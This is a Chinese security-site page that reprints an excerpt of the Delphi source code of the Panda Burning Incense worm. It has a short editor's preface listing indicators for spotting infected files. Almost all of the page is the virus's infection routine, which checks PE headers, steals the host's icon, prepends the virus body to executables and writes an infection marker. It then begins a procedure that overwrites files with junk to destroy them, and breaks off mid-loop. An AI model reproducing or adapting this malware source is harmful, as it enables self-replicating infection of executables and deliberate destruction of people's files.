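熊猫烧香核心代码
标签:电脑安全知识,个人电脑安全,http://www.laixuea.com
(说明:本页代码为节选,感染过程的过程头不在页面内,smashfile 过程在末尾被截断。按代码所示,程序用于识别自身的文件名是 japussy.exe;被感染文件的末尾会追加 4 字节标记 $44444444,小于 10240 字节的文件和非 PE 文件会被跳过,这些特征可用于排查受感染文件。)
hdrstream, srcstream: tfilestream;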
icostream, dststream: tmemorystream;
iid: longint;
aicon: ticon;
infected, ispe: boolean;
i: integer;
buf: array[0..1] of char;
begin
try //出错则文件正在被使用,退出
if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染
exit;
infected := false;
ispe := false;
srcstream := tfilestream.create(filename, fmopenread);
try
for i := 0 to $108 do //检查pe文件头
begin
srcstream.seek(i, sofrombeginning);
srcstream.read(buf, 2);
if (buf[0] = #80) and (buf[1] = #69) then //pe标记
begin
ispe := true; //是pe文件
break;
end;
end;
srcstream.seek(-4, sofromend); //检查感染标记
srcstream.read(iid, 4);
if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染
infected := true;
finally
srcstream.free;
end;
if infected or (not ispe) then //如果感染过了或不是pe文件则退出
exit;
icostream := tmemorystream.create;
dststream := tmemorystream.create;
try
aicon := ticon.create;
try
//得到被感染文件的主图标(744字节),存入流
aicon.releasehandle;
aicon.handle := extracticon(hinstance, pchar(filename), 0);
aicon.savetostream(icostream);
finally
aicon.free;
end;
srcstream := tfilestream.create(filename, fmopenread);
//头文件
hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
try
//写入病毒体主图标之前的数据
copystream(hdrstream, 0, dststream, 0, iconoffset);
//写入目前程序的主图标
copystream(icostream, 22, dststream, iconoffset, iconsize);
//写入病毒体主图标到病毒体尾部之间的数据
copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
//写入宿主程序
copystream(srcstream, 0, dststream, headersize, srcstream.size);
//写入已感染的标记
dststream.seek(0, 2);
iid := $44444444;
dststream.write(iid, 4);
finally
hdrstream.free;
end;
finally
srcstream.free;
icostream.free;
dststream.savetofile(filename); //替换宿主文件
dststream.free;
end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure smashfile(filename: string);
var
filehandle: integer;
i, size, mass, max, len: integer;
begin
try
setfileattributes(pchar(filename), 0); //去掉只读属性
filehandle := fileopen(filename, fmopenwrite); //打开文件
try
size := getfilesize(filehandle, nil); //文件大小
i := 0;
randomize;
max := random(15); //写入垃圾码的随机次数
if max < 5 then
max := 5;
mass := size div max; //每个间隔块的大小
len := length(catchword);
while i < max do
begin
fileseek(filehandle, i * mass, 0); //定位
//写入垃圾码,将文件彻底破坏掉